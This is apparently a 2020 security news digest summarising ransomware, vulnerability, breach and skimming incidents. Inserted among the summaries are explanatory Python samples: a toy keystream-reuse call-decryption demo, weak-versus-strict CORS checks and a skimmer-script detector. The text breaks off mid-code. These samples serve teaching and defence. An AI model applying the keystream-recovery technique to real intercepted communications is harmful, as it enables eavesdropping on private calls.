Table of Contents

  1. Ransomware
    1. Ransomware Reportedly Hits Ventilator Maker
    2. Canadian Tire, a well-established retail company based in Canada Got Allegedly Breached by Netwalker
    3. Netwalker Ransomware Operators Allegedly Struck Woodstream
    4. Nefilim Ransomware Operators Allegedly Targeted the SPIE Group, an independent European leader in multi-technical services
    5. Ma Labs Allegedly Breached by REvil Ransomware Operators
    6. Dharma ransomware created a hacking toolkit to make cybercrime easy
    7. Avaddon ransomware launches data leak site to extort victims
    8. Imperial Valley College Hit With Ransomware Attack; Multiple Systems Impacted
    9. Colorado city forced to pay $45,000 ransom to decrypt files
    10. Medical Debt Collection Firm R1 RCM Hit in Ransomware Attack
    11. Over 25% of all UK universities were attacked by ransomware
    12. Catching a Human-Operated Maze Ransomware Attack In Action
  2. Vulnerabilities
    1. Operation PowerFall: Two zero-day vulnerabilities
    2. Call Me Maybe: Eavesdropping Encrypted LTE Calls With ReVoLTE
    3. Microsoft August 2020 Patch Tuesday fixes 2 zero-days, 120 flaws
    4. Windows Print Spooler Patch Bypass Re-Enables Persistent Backdoor
    5. MMS Exploit Part 5: Defeating Android ASLR, Getting RCE
    6. Hunting for SQL injections (SQLis) and Cross-Site Request Forgeries (CSRFs) in WordPress Plugins
    7. Adobe fixes critical code execution bugs in Acrobat and Reader
    8. SAP updates security note for critical RECON vulnerability
    9. Amazon Alexa could be exploited for theft of voice history, PII, skill tampering
    10. Citrix fixes critical bugs allowing takeover of XenMobile Servers
    11. vBulletin fixes ridiculously easy to exploit zero-day RCE bug
    12. Over 400 vulnerabilities on Qualcomm’s Snapdragon chip
  3. APT
    1. CactusPete APT group’s updated Bisonal backdoor
    2. Tor security advisory: exit relays running sslstrip in May and June 2020
    3. FBI and NSA expose new Linux malware Drovorub, used by Russian state hackers
  4. Breaches
    1. Anonymous Germany hacked Sasek sect: training videos show how members are fanatical
    2. Around 570K User Records of Devire Recruitment Agency Leaked on Darkweb for Free
    3. Revealed: 1,400 data breaches at HSE included patient photos and medical files
    4. Maze Reportedly Posts Exfiltrated Canon USA Data
    5. Unsecured Database Exposed on Web - Then Deleted
    6. SANS infosec training org suffers data breach after phishing attack
    7. NCC Group admits its training data was leaked online after folders full of CREST pentest certification exam notes posted to GitHub
    8. The skinny on the Instacart breach
    9. U.S. spirits and wine giant hit by cyberattack, 1TB of data stolen
    10. Hacker leaks data for U.S. gun exchange site on cybercrime forum
    11. Federal Appeals Court Dismisses CareFirst Data Breach Appeal
    12. Argentina exposes COVID-19 health data in error
    13. Michigan State University discloses credit card theft incident
    14. Premier Health Partners Discloses Breach, but No Notifications to Patients Yet
  5. Malware
    1. Mekotio banking trojan imitates update alerts to steal Bitcoin
    2. One of the Most Destructive malware is Spreading Through UNESCO Website
    3. Beware: AgentTesla Infostealer Now More Powerful
    4. For six months, security researchers have secretly distributed an Emotet vaccine across the world
    5. Emotet malware strikes U.S. businesses with COVID-19 spam
    6. PurpleWave—A New Infostealer from Russia
    7. AA20-227A: Phishing Emails Used to Deploy KONNI Malware
    8. Mac malware spreads through Xcode projects, abuses WebKit, Data Vault vulnerabilities
    9. Script-Based Malware: A New Attacker Trend on Internet Explorer
    10. 270 million malware attacks occurred between January and March
  6. Crime
    1. Crooks in Lamborghinis: how cybercriminals continue to exploit US coronavirus relief loans
    2. RedCurl cybercrime group has hacked companies for three years
    3. Malicious Cyber Actor Spoofing COVID-19 Loan Relief Webpage via Phishing Emails
    4. Boomer outsmarts hackers: “Kiss your cash goodbye”
    5. Cyber Adversaries Are Exploiting the Global Pandemic at Enormous Scale
    6. BEC Scam Costs Trading Firm Virtu Financial $6.9 Million
    7. University Investigates Skimming of Credit Card Data
    8. Network intruders selling access to high-value companies
    9. Hackers attack the Bundeswehr fleet service
    10. US Seizes $2 Million in Cryptocurrency From Terrorist Groups
    11. Texas Man Sentenced to 57 Months for Computer Hacking and Aggravated Identity Theft
    12. Phishing Threat Preys on Desperate Business Owners
    13. Phishing Campaign Spoofs SBA Loan Offer
    14. ATM Hackers Have Picked Up Some Clever New Tricks
  7. Privacy
    1. Homeland Security Details New Tools For Extracting Device Data at US Borders
    2. Police Use of Facial Recognition Violates Human Rights, UK Court Rules
    3. TikTok Tracked User Data Using Tactic Banned By Google
    4. TSA considers new system for flyers without ID
    5. Clearview AI landed a new facial recognition contract with ICE
    6. Medical records for more than 61,000 cardiac patients left unsecured online
    7. A simple telephony honeypot received 1.5 million robocalls across 11 months
    8. Leaked Documents Reveal What TikTok Shares with Authorities — in the U.S.
  8. Politics
    1. YouTube Bans Videos Containing Hacked Information That Could Interfere With the Election
    2. Belarus has shut down the internet amid a controversial election
    3. The Clean Network – United States Department of State
  9. Misc
    1. Internet disruption hits Belarus on election day
    2. Mozilla Fires Servo Devs and Security Response Teams
    3. NSA Owns Everything (2015)
    4. FireEye’s bug bounty program goes public
    5. Dutch ISP Ziggo demonstrates how not to inform your customers about a security flaw
    6. Why & Where You Should Plant Your Flag
    7. Stalkerware Phone Spying Apps Have Escaped Google's Ad Ban
    8. Zoom Sued By Consumer Group For Misrepresenting Its Encryption Protections
    9. Threema joins the ranks of E2EE chat apps that support encrypted video calls
    10. Plymouth Passport Office’s pitiful password privacy
    11. Windows Defender deletes Citrix components mislabeled as malware
    12. Expired certificate led to an undercount of COVID-19 results
    13. Signal adds message requests to stop spam and protect user privacy
    14. Boeing 747s receive software updates over floppy disks

Ransomware

Ransomware Reportedly Hits Ventilator Maker

A manufacturer of transit communication systems that pivoted to build ventilators during the COVID-19 pandemic is reportedly the latest victim of the DoppelPaymer ransomware gang. Boyce Technologies Inc., based in Long Island City, New York, was targeted by the ransomware gang, which has threatened to leak data stolen in the incident unless the company pays a ransom, according to the news site Cointelegraph.

Canadian Tire, a well-established retail company based in Canada Got Allegedly Breached by Netwalker

Recently, the Cyble Research Team came across a leak post in which the Netwalker ransomware operators claim to have breached Canadian Tire and to be in possession of sensitive data from one of its stores in Kelowna, Canada.

Netwalker Ransomware Operators Allegedly Struck Woodstream

Recently, CybleInc came across a leak post in which the Netwalker ransomware operators claim to have breached the Woodstream Corporation and to be in possession of the company's sensitive data.

Nefilim Ransomware Operators Allegedly Targeted the SPIE Group, an independent European leader in multi-technical services

The Cyble Research Team came across a post by the Nefilim ransomware operators in which they claim to have breached the SPIE Group and to be in possession of the company's sensitive data.

Ma Labs Allegedly Breached by REvil Ransomware Operators

Recently, during its continuous monitoring of the deep web and dark web, the Cyble Research Team came across a disclosure post in which REvil ransomware operators claimed to have breached Ma Labs. Founded in 1983, Ma Labs is one of the leading computer component distributors in the United States; with over 1,200 employees, the company has annual revenue of around $2 billion.

Dharma ransomware created a hacking toolkit to make cybercrime easy

The Dharma Ransomware-as-a-Service (RaaS) operation makes it easy for a wannabe cyber-criminal to get into the ransomware business by offering a toolkit that does almost everything for them. A RaaS operation is a cybercrime model where the developers are in charge of managing the ransomware development and the ransom payment system, while affiliates are responsible for compromising victims and deploying the ransomware. As part of this model, the developers earn between 30% and 40% of any ransom payment, and the affiliates keep the rest. Most of today's enterprise-targeting ransomware groups operate as a private RaaS model, where only the most talented hackers are invited to participate.

Avaddon ransomware launches data leak site to extort victims

Avaddon ransomware is the latest cybercrime operation to launch a data leak site that will be used to publish the stolen data of victims who do not pay a ransom demand. Since the Maze operators began publicly leaking files stolen in ransomware attacks, other operations soon followed suit and began creating data leak sites to publish stolen files. These sites are designed to scare victims into paying a ransom under the threat that their files will be leaked to the public. If publicly released, this data could expose financial information, personal information of employees, and client data, which amounts to a data breach. Cybersecurity intelligence firm Kela has told BleepingComputer that the Avaddon ransomware operators announced on a Russian-speaking hacker forum this weekend that they have launched a new data leak site.

Imperial Valley College Hit With Ransomware Attack; Multiple Systems Impacted

(Imperial Valley College has released a brief press statement with some additional information.) A ransomware attack unleashed on Imperial Valley College's computer system on Aug. 6 brought down critical systems that remain offline and will likely stay offline until further notice, a college spokesperson confirmed.

Colorado city forced to pay $45,000 ransom to decrypt files

A city in Colorado, USA, has been forced to pay $45,000 after the City's devices were encrypted in July, and they were unable to restore necessary files from backup. On July 27th, the City of Lafayette suffered a ransomware attack that impacted their phone services, email, and online payment reservation systems. At the time, the City had not explained what was causing the outage but stated that residents should use 911 or an alternate number for emergency services. Over a week later, the City announced that they were victims of a ransomware attack that encrypted their devices and data, and took down their systems. While financial data was recoverable from backups, after weighing the costs, the City decided to pay a $45,000 ransom to an unknown ransomware operation to receive a decryption tool to recover other encrypted files.

Medical Debt Collection Firm R1 RCM Hit in Ransomware Attack

R1 RCM acknowledged taking down its systems in response to a ransomware attack, but otherwise declined to comment for this story. The "RCM" portion of its name refers to "revenue cycle management," an industry which tracks profits throughout the life cycle of each patient, including patient registration, insurance and benefit verification, medical treatment documentation, and bill preparation and collection from patients. The company has access to a wealth of personal, financial and medical information on tens of millions of patients, including names, dates of birth, Social Security numbers, billing information and medical diagnostic data. It's unclear when the intruders first breached R1's networks, but the ransomware was unleashed more than a week ago, right around the time the company was set to release its 2nd quarter financial results for 2020. R1 RCM declined to discuss the strain of ransomware it is battling or how it was compromised. Sources close to the investigation tell KrebsOnSecurity the malware is known as Defray.

Over 25% of all UK universities were attacked by ransomware

A third of the universities in the United Kingdom responding to a freedom of information (FOI) request admitted to being a victim of a ransomware attack. These represent more than 25% of the universities and colleges in the country. The incidents occurred in the past decade, most of them between 2015 and 2017. Several educational institutions suffered at least two file-encrypting attacks over the past decade, one of them recording more than 40 since 2013.

Catching a Human-Operated Maze Ransomware Attack In Action

Maze ransomware is one of the most widespread ransomware strains currently in the wild and is distributed by different capable actors. SentinelLabs discovered a Maze affiliate deploying tailor-made persistence methods prior to delivering the ransomware. The actor appears to have used a stolen certificate to sign its Beacon stager. In common with other attacks, the actor used an HTA payload as an interactive shell, which researchers were able to catch live and deobfuscate.

Vulnerabilities

Operation PowerFall: Two zero-day vulnerabilities

Kaspersky has prevented an attack on a South Korean company and discovered two zero-day vulnerabilities in a campaign dubbed Operation PowerFall. They found the first in Internet Explorer 11's JavaScript engine; that one enabled the attackers to remotely execute arbitrary code. The second, detected in an operating system service, let the attackers escalate privileges and perform unauthorized actions.

Call Me Maybe: Eavesdropping Encrypted LTE Calls With ReVoLTE

Voice over LTE (VoLTE) is a packet-based telephony service seamlessly integrated into the Long Term Evolution (LTE) standard. By now all major telecommunication operators use VoLTE. To secure the phone calls, VoLTE encrypts the voice data between the phone and the network with a stream cipher. The stream cipher must generate a unique keystream for each call to prevent the problem of keystream reuse. Researchers introduced ReVoLTE, an attack that exploits an LTE implementation flaw to recover the contents of an encrypted VoLTE call. This enables an adversary to eavesdrop on VoLTE phone calls. ReVoLTE makes use of a predictable keystream reuse, which was discovered by Raza & Lu. Eventually, the keystream reuse allows an adversary to decrypt a recorded call with minimal resources.
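The paragraph above rests on a single cryptographic fact: a stream cipher XORs plaintext with keystream, so two calls encrypted under the same keystream satisfy C1 XOR C2 = P1 XOR P2, and anyone who knows one plaintext recovers the other. The following Python demonstration is an added example and is not code from the ReVoLTE researchers; it replaces the real LTE cipher with a toy HMAC-based keystream (an assumption made for self-containment), and the "calls" are constructed byte strings. It shows recovery succeeding when the base station reuses the same bearer identity and counter for a second call, and failing once a fresh counter is used, which is exactly the property the text says the cipher "must" provide.

```python
import hashlib
import hmac

# Constructed toy key; the real LTE cipher (SNOW 3G / AES-based EEA) and its key
# derivation are NOT reproduced here, only the keystream-reuse property.
KEY = bytes.fromhex("000102030405060708090a0b0c0d0e0f")


def keystream(key: bytes, bearer_id: int, count: int, length: int) -> bytes:
    """Toy keystream generator: HMAC-SHA256 in counter mode, keyed by the
    (bearer id, count) pair. Like any deterministic stream cipher, identical
    inputs produce identical keystream, which is the root of the problem."""
    out = bytearray()
    block = 0
    while len(out) < length:
        msg = (bearer_id.to_bytes(4, "big") + count.to_bytes(4, "big")
               + block.to_bytes(4, "big"))
        out += hmac.new(key, msg, hashlib.sha256).digest()
        block += 1
    return bytes(out[:length])


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt(key: bytes, bearer_id: int, count: int, plaintext: bytes) -> bytes:
    """Stream-cipher encryption: ciphertext = keystream XOR plaintext."""
    return xor_bytes(keystream(key, bearer_id, count, len(plaintext)), plaintext)


def recover_from_reuse(ct_target: bytes, ct_known: bytes, pt_known: bytes) -> bytes:
    """If both ciphertexts used the same keystream K, then
    ct_target ^ ct_known == pt_target ^ pt_known, so XORing with the known
    plaintext yields the target plaintext (the classic 'two-time pad')."""
    return xor_bytes(xor_bytes(ct_target, ct_known), pt_known)


# Constructed sample "voice frames"; both are 41 bytes so the XOR lines up.
TARGET_CALL = b"constructed sample: victim's voice frames"
KNOWN_CALL = b"constructed sample: attacker's own frames"


def demo_reuse() -> bytes:
    """Flawed network: same bearer id and count for two consecutive calls,
    so the second call reuses the first call's keystream."""
    ct_target = encrypt(KEY, bearer_id=5, count=0, plaintext=TARGET_CALL)
    ct_known = encrypt(KEY, bearer_id=5, count=0, plaintext=KNOWN_CALL)
    return recover_from_reuse(ct_target, ct_known, KNOWN_CALL)


def demo_fresh_keystream() -> bytes:
    """Correct behaviour: a fresh count per call gives a fresh keystream, so
    the same recovery step yields only noise."""
    ct_target = encrypt(KEY, bearer_id=5, count=0, plaintext=TARGET_CALL)
    ct_known = encrypt(KEY, bearer_id=5, count=1, plaintext=KNOWN_CALL)
    return recover_from_reuse(ct_target, ct_known, KNOWN_CALL)


if __name__ == "__main__":
    print("reused keystream  ->", demo_reuse())
    print("fresh keystream   ->", demo_fresh_keystream())
```

The defensive takeaway is the one the paper makes: the fix is not a stronger cipher but guaranteeing that the (key, bearer, counter) triple never repeats across calls, which is a base-station configuration and implementation matter rather than a cryptographic one.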

Microsoft August 2020 Patch Tuesday fixes 2 zero-days, 120 flaws

With the release of the August 2020 Patch Tuesday security updates, Microsoft has released one Servicing Stack Update for Windows 10 advisory and fixes for 120 vulnerabilities in Microsoft products. Of these vulnerabilities, 17 are classified as Critical, and 103 are classified as Important. This release is the third-largest Patch Tuesday update ever released by Microsoft, with the second-largest being 123 fixes in July 2020, and the largest being issued in June 2020 with 129 fixes. According to Microsoft, two of the vulnerabilities are actively being used in attacks, with one of them publicly disclosed. The first is "CVE-2020-1380 | Scripting Engine Memory Corruption Vulnerability," a remote code execution vulnerability in Internet Explorer 11 that was discovered by Boris Larin (Oct0xor) of Kaspersky Lab. The second vulnerability that is actively being used and publicly disclosed is "CVE-2020-1464 | Windows Spoofing Vulnerability," which allows attackers to spoof other companies when digitally signing an executable.

Windows Print Spooler Patch Bypass Re-Enables Persistent Backdoor

In May 2020, Microsoft patched CVE-2020-1048, a critical privilege escalation bug in Windows. Through this vulnerability, an attacker with the ability to execute low-privileged code on a Windows machine can easily establish a persistent backdoor, allowing the attacker to return at any later time and escalate privileges to SYSTEM. The backdoor is "persistent" in the sense that, once established, the backdoor will persist even after a patch for the vulnerability has been applied. CVE-2020-1048 is credited to Peleg Hadar (@peleghd) and Tomer Bar of SafeBreach Labs. It is also described in a highly-detailed Windows Internals blog post by Yarden Shafir & Alex Ionescu, who apparently made an independent discovery of this bug at about the same time as the SafeBreach Labs team. On May 25, 2020, a mere 13 days after the release of the patch for CVE-2020-1048, the ZDI program received a submission from a researcher who goes by the name math1as. In the submission, math1as showed how Microsoft's patch is insufficient to prevent exploitation of the vulnerability. This new flaw was addressed in the August patches as CVE-2020-1337.

MMS Exploit Part 5: Defeating Android ASLR, Getting RCE

This post is the fifth and final of a multi-part series capturing Mateusz Jurczyk's journey from discovering a vulnerable little-known Samsung image codec, to completing a remote zero-click MMS attack that worked on the latest Samsung flagship devices.

Hunting for SQL injections (SQLis) and Cross-Site Request Forgeries (CSRFs) in WordPress Plugins

Researchers from Tenable have written a blog post detailing three reported vulnerabilities in the `SRS Simple Hits Counter` and `Email Subscribers & Newsletters` WordPress plugins.

Adobe fixes critical code execution bugs in Acrobat and Reader

Adobe has released security updates for Adobe Acrobat, Reader, and Lightroom that fix a total of twenty-six vulnerabilities in the three programs. Of the vulnerabilities, eleven are classified as 'Critical' because they allow attackers to bypass security features or perform remote code execution on vulnerable computers. Remote code execution vulnerabilities are the most damaging, as they allow the attacker to run commands on affected computers without a user's permission or knowledge.

SAP updates security note for critical RECON vulnerability

SAP released its security patches for August, alerting of new critical and high-severity vulnerabilities in several of its products, mostly NetWeaver Application Server (AS). SAP has also updated its security note for the maximum severity RECON vulnerability with a related bug that could enable an unauthenticated attacker to access various folders in the directory structure. The developer also updated the July 2020 Patch Day security note for RECON, a critical issue disclosed by researchers at cybersecurity firm Onapsis, who said that it impacted more than 40,000 SAP customers. Two days after disclosure, proof-of-concept exploit code emerged and researchers recorded active scans for devices vulnerable to RECON.

Amazon Alexa could be exploited for theft of voice history, PII, skill tampering

Check Point Research said on Thursday that the security issues were caused by Amazon Alexa subdomains susceptible to Cross-Origin Resource Sharing (CORS) misconfiguration and cross-site scripting (XSS) attacks. When Check Point first began examining the Alexa mobile app, the company noticed the existence of an SSL pinning mechanism that prevents traffic inspection. However, this pinning could be bypassed using the Frida SSL universal unpinning script. This led to the discovery of the app's misconfigured CORS policy, which allowed Ajax requests to be sent from Amazon subdomains. If a subdomain was found to be vulnerable to code injection, an XSS attack could be launched, and this was performed via track.amazon.com and skillsstore.amazon.com. According to Check Point, it would only take a victim clicking on a malicious link to exploit the vulnerabilities. A victim routed to a domain via phishing, for example, could be subject to code injection and the theft of their Amazon-related cookies.
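The CORS weakness described above is a pattern worth seeing side by side with its fix: an API that reflects any origin "looking like" the company's domain effectively extends its trust to every subdomain, so a single XSS on any of them reaches authenticated API responses. The Python below is an added example, not Check Point's or Amazon's code, and uses constructed placeholder origins under example.com (an assumption; nothing here is the real Alexa API). It contrasts a substring-based origin check with an exact-match allow-list as a server would apply it to the incoming Origin header.

```python
from typing import Dict, Optional
from urllib.parse import urlsplit

# Constructed allow-list of first-party web origins (placeholder domains).
# Each entry is a full origin: scheme + host (+ port if non-default).
ALLOWED_ORIGINS = {
    "https://www.example.com",
    "https://account.example.com",
}


def weak_cors_headers(origin: str) -> Optional[Dict[str, str]]:
    """Misconfiguration: any origin whose string contains the company domain
    is reflected back, with credentials allowed. A script running on ANY
    subdomain (e.g. one with an XSS bug) or on a look-alike host such as
    example.com.attacker.test can then read authenticated API responses."""
    if "example.com" in origin:
        return {
            "Access-Control-Allow-Origin": origin,
            "Access-Control-Allow-Credentials": "true",
        }
    return None


def strict_cors_headers(origin: str) -> Optional[Dict[str, str]]:
    """Exact-match allow-list. The Origin header must be an https origin
    that equals one of the listed values after normalisation; "null",
    http://, paths, and unlisted subdomains are all refused. Vary: Origin
    keeps shared caches from serving one origin's answer to another."""
    parts = urlsplit(origin)
    if parts.scheme != "https" or not parts.netloc or parts.path not in ("", "/"):
        return None
    normalized = f"{parts.scheme}://{parts.netloc}".lower()
    if normalized not in ALLOWED_ORIGINS:
        return None
    return {
        "Access-Control-Allow-Origin": normalized,
        "Access-Control-Allow-Credentials": "true",
        "Vary": "Origin",
    }


def compare(origin: str) -> Dict[str, bool]:
    """Return whether each policy would grant credentialed access to `origin`."""
    return {
        "weak_allows": weak_cors_headers(origin) is not None,
        "strict_allows": strict_cors_headers(origin) is not None,
    }


if __name__ == "__main__":
    for o in ("https://www.example.com",
              "https://track.example.com",          # unlisted subdomain
              "https://example.com.attacker.test",  # look-alike host
              "null"):                              # sandboxed / file origin
        print(o, compare(o))
```

When reviewing a CORS handler, the two things to look for are exactly the ones contrasted here: whether `Access-Control-Allow-Origin` is derived from the request by pattern matching rather than compared against a fixed set, and whether `Access-Control-Allow-Credentials: true` is sent alongside it, since that combination is what turns a subdomain XSS into cross-origin data theft.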

Citrix fixes critical bugs allowing takeover of XenMobile Servers

Citrix fixed 5 vulnerabilities impacting multiple versions of Citrix Endpoint Management (CEM) on-premise instances, also known as XenMobile Server. On-premise Citrix XenMobile provides a unified interface to manage employees' desktops, notebooks, and mobile devices (tablets and smartphones) through a single platform. The company strongly recommends customers to immediately update vulnerable XenMobile Server deployments since attackers will most likely immediately start scanning for vulnerable servers and attempt to exploit them. "We recommend these upgrades be made immediately," Citrix says. "While there are no known exploits as of this writing, we do anticipate malicious actors will move quickly to exploit." "Remediations have already been applied to cloud versions, but hybrid rights users need to apply the upgrades to any on-premises instance."

vBulletin fixes ridiculously easy to exploit zero-day RCE bug

A simple one-line exploit has been published for a zero-day pre-authentication remote code execution (RCE) vulnerability in the vBulletin forum software. vBulletin is an immensely popular online forum software utilized by large brands such as Electronic Arts, Zynga, Sony, Pearl Jam, NASA, Steam, and many more. In September 2019, an unknown security researcher disclosed a zero-day RCE vulnerability in vBulletin's versions 5.0 through 5.4, which was tracked as CVE-2019-16759. Using this vulnerability, attackers could remotely exploit a bug in vBulletin's PHP Module to execute any PHP command on the remote server without logging into the forum.

Over 400 vulnerabilities on Qualcomm’s Snapdragon chip

In this research, dubbed "Achilles", CheckPoint performed an extensive security review of a DSP chip from one of the leading manufacturers: Qualcomm Technologies. Qualcomm provides a wide variety of chips that are embedded into devices that make up over 40% of the mobile phone market, including high-end phones from Google, Samsung, LG, Xiaomi, OnePlus and more. More than 400 vulnerable pieces of code were found within the DSP chip.

APT

CactusPete APT group’s updated Bisonal backdoor

In February 2020, Kaspersky spotted new activity from CactusPete, a Chinese-speaking cyber-espionage APT group with medium-level technical capabilities, and found that the people behind it have upped their game. They appear to have received support and have access to more complex code such as ShadowPad, which CactusPete deployed in 2020.

Tor security advisory: exit relays running sslstrip in May and June 2020

Tor reports that Tor exit relays have been running sslstrip on outgoing traffic twice earlier this year, and describes what can be done to avoid such attacks. Based on their investigation, Nusenu said the primary goal of these SSL stripping attacks was to allow the group to replace Bitcoin addresses inside HTTP traffic going to Bitcoin mixing services.

FBI and NSA expose new Linux malware Drovorub, used by Russian state hackers

The FBI and NSA have published a joint security alert containing details about a new strain of Linux malware that the two agencies say was developed and deployed in real-world attacks by Russia's military hackers. The two agencies say Russian hackers used the malware, named Drovorub, to plant backdoors inside hacked networks. Based on the evidence the two agencies have collected, FBI and NSA officials claim the malware is the work of APT28 (Fancy Bear, Sednit), a codename given to the hackers operating out of military unit 26165 of the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS). Through their joint alert, the two agencies hope to raise awareness in the US private and public sectors so IT administrators can quickly deploy detection rules and prevention measures.

Breaches

Anonymous Germany hacked Sasek sect: training videos show how members are fanatical

The hacker collective Anonymous has published internal training videos from the Swiss sect Organische Christus-Generation (OCG). For example, the videos show sect leader Ivo Sasek swearing in hundreds of members in a hall, using war rhetoric against "the elite" and the media. Sentences like:

Around 570K User Records of Devire Recruitment Agency Leaked on Darkweb for Free

The Cyble Research Team identified a threat actor who leaked around 570K records of people looking for jobs from the database of the Devire Recruitment agency, which describes itself as follows: "Established in the year 1987, and for more than 30 years we have represented leading employers on the European market by carrying out comprehensive recruitment projects implementing the latest solutions in the area of IT services and helping to build the image of an employer of choice."

Revealed: 1,400 data breaches at HSE included patient photos and medical files

The HSE has suffered almost 1,400 separate data breaches over the past two years involving photographing of patients, infection status being disclosed to other family members, and the discovery of confidential medical files in public places. The number of breaches showed a sharp rise between 2018, when 556 incidents were recorded, and last year when there were 833.

Maze Reportedly Posts Exfiltrated Canon USA Data

The Maze ransomware group has posted on its darknet website some data it claims it stole during a recent attack against Canon USA, according to the security firm Emsisoft. Maze claims to have posted 2.5 GB, or about 5%, of the data it says it exfiltrated from the imaging company during an early August ransomware attack, Brett Callow, an Emsisoft threat analyst, tells Information Security Media Group. A screenshot of the Maze posting shared by Callow shows a ZIP file named StrategicPlanningpart62 as proof Maze had access to Canon's internal data. ISMG is unable to independently verify Maze's claim. No information regarding a ransom demand is mentioned on the gang's website. The company reported on Aug. 4 that a July 30 loss of 10 GB of images from the cloud storage site image.canon was the result of a technical issue and not a cyber intrusion.

Unsecured Database Exposed on Web - Then Deleted

In a blog Tuesday, independent security researcher Volodymyr "Bob" Diachenko writes of his discovery on July 13 of an unprotected database with information on 3.1 million patients that was exposed to the internet. The database appears to be owned by Adit, a Houston-based online medical appointment and patient management software company.

SANS infosec training org suffers data breach after phishing attack

The SANS cybersecurity training organization has suffered a data breach after one of their employees fell victim to a phishing attack. In a notification posted to their site, SANS states that one of their employees fell for a phishing attack that allowed a threat actor to gain access to their email account.

NCC Group admits its training data was leaked online after folders full of CREST pentest certification exam notes posted to GitHub

British infosec biz NCC Group has admitted to The Register that its internal training materials were leaked on GitHub -- after folders purporting to help people pass the CREST pentest certification exams appeared in a couple of repositories. The documents, posted to the cloudy code shack by an account set up last month, were held in a folder marked "cheatsheets". They appeared to be a collection of exceptionally frank and well informed training materials. The offending repositories have now been removed from GitHub though we understand some forked copies may still exist.

The skinny on the Instacart breach

Instacart, one of the top three brands in grocery delivery and pick-up services in the world, was recently believed to have been hacked, after more than 270,000 accounts of its clients were seen being peddled on the Dark Web. It was reported that these accounts contained information such as names, addresses, credit card data, and transaction history. BuzzFeed News, which initially reported the incident, indicated that some affected parties were interviewed and, upon being shown data taken from the breach, confirmed it was indeed their data being sold. A cybersecurity expert who also looked at some of the data lent more weight to the breach's validity. Days after the report, however, Instacart denied that a security breach happened. "Our teams have been working around the clock to quickly determine the validity of reports related to site security and so far our investigation had shown that the Instacart platform was not compromised or breached," the company wrote in a Medium post.

U.S. spirits and wine giant hit by cyberattack, 1TB of data stolen

Brown-Forman, one of the largest U.S. companies in the spirits and wine business, suffered a cyber attack. The intruders allegedly copied 1TB of confidential data; they plan to sell the most important information to the highest bidder and leak the rest. Sodinokibi (REvil) ransomware operators announced on Friday that they had compromised Brown-Forman's computer network and spent more than a month examining user services, cloud data storage, and general structure. Following the incursion, the attackers claim they stole 1TB of data that includes confidential information about employees, company agreements, contracts, financial statements, and internal correspondence.

Hacker leaks data for U.S. gun exchange site on cybercrime forum

A hacker has released the databases of Utah-based gun exchange, hunting, and kratom sites for free on a cybercrime forum. On August 10th, a threat actor posted databases that they claim contain 195,000 user records for the utahgunexchange.com, 45,000 records for their video site, 15,000 records from the hunting site muleyfreak.com, and 24,000 user records from the Kratom site deepjunglekratom.com.

Federal Appeals Court Dismisses CareFirst Data Breach Appeal

The D.C. Circuit has ruled that it lacks jurisdiction to hear the appeal of CareFirst customers whose data was stolen in a 2014 data breach. The lower court in Attias v. CareFirst dismissed most of the plaintiffs and claims in the case for failure to allege damages and certified the dismissed claims for appeal. The D.C. Circuit determined that some of the claims could not be appealed until the remaining claims were resolved by the lower court, and it was not clear whether the district court judge intended to certify the claims of the dismissed plaintiffs alone. The decision comes over a year after the parties briefed the substantive questions on appeal. EPIC filed an amicus brief that urged the court to impose a duty of reasonable data protection on businesses to ensure that companies protect the personal data they collect. EPIC also filed an amicus brief in the case the last time it was in the D.C. Circuit on a challenge to consumer standing. The D.C. Circuit held that the CareFirst consumers had standing to sue for the data breach.

Argentina exposes COVID-19 health data in error

Argentina's health officials have apparently exposed personal medical data relating to some 115,000 COVID-19 quarantine exemption applicants, in what represents a major health sector data breach.

Michigan State University discloses credit card theft incident

Michigan State University (MSU) disclosed that attackers were able to steal credit card and personal information from roughly 2,600 users of its shop.msu.edu online store. The attackers were able to inject malicious scripts designed to harvest and exfiltrate customers' payment cards after exploiting a now-addressed website vulnerability. Such attacks are known as web skimming attacks (also known as Magecart or e-skimming) and are usually the result of attackers being able to deploy card skimmer scripts on e-commerce sites via compromised admin accounts. An unauthorized party gained access to Michigan State University's online store, shop.msu.edu, and placed malicious code to expose shoppers' credit card numbers between Oct. 19, 2019 and June 26, 2020, MSU said in a statement.
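Web skimming of the kind described above works by adding a script to a checkout page that the site owner never intended to be there, so a useful defensive control is to diff the scripts actually served by the page against a baseline. The Python below is an added example, not MSU's or any vendor's code: it parses a page with the standard-library HTML parser, flags external scripts loaded from hosts outside an allow-list, and flags inline scripts whose hash is not in a baseline set. The checkout page, the allow-list and the injected script are all constructed for the example (placeholder example.edu and attacker.test hosts), and the "skimmer" is an empty submit listener standing in for the real thing.

```python
import hashlib
from html.parser import HTMLParser
from typing import List, Set
from urllib.parse import urlsplit


class _ScriptCollector(HTMLParser):
    """Collect <script src=...> URLs and the bodies of inline <script> tags."""

    def __init__(self) -> None:
        super().__init__()
        self.srcs: List[str] = []
        self.inline: List[str] = []
        self._in_inline = False
        self._buf: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.srcs.append(src)
        else:
            self._in_inline = True
            self._buf = []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            self.inline.append("".join(self._buf))
            self._in_inline = False


def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def find_unexpected_scripts(html: str, allowed_hosts: Set[str],
                            known_inline_hashes: Set[str]) -> List[str]:
    """Return one finding per script that is not part of the baseline:
    an external script from a host outside `allowed_hosts`, or an inline
    script whose SHA-256 is not in `known_inline_hashes`. Relative src
    values (no host) are treated as same-origin and not flagged here."""
    parser = _ScriptCollector()
    parser.feed(html)
    findings: List[str] = []
    for src in parser.srcs:
        host = urlsplit(src).netloc.lower()
        if host and host not in allowed_hosts:
            findings.append(f"external script from unexpected host: {src}")
    for code in parser.inline:
        digest = sha256_hex(code)
        if digest not in known_inline_hashes:
            findings.append(f"inline script not in baseline (sha256 {digest[:12]}...)")
    return findings


# --- Constructed baseline for a fictitious store checkout page -------------
ALLOWED_HOSTS = {"shop.example.edu", "cdn.example.edu"}
BASELINE_INLINE = "window.checkoutConfig = {currency: 'USD'};"
KNOWN_INLINE_HASHES = {sha256_hex(BASELINE_INLINE)}

CLEAN_PAGE = (
    "<html><head>"
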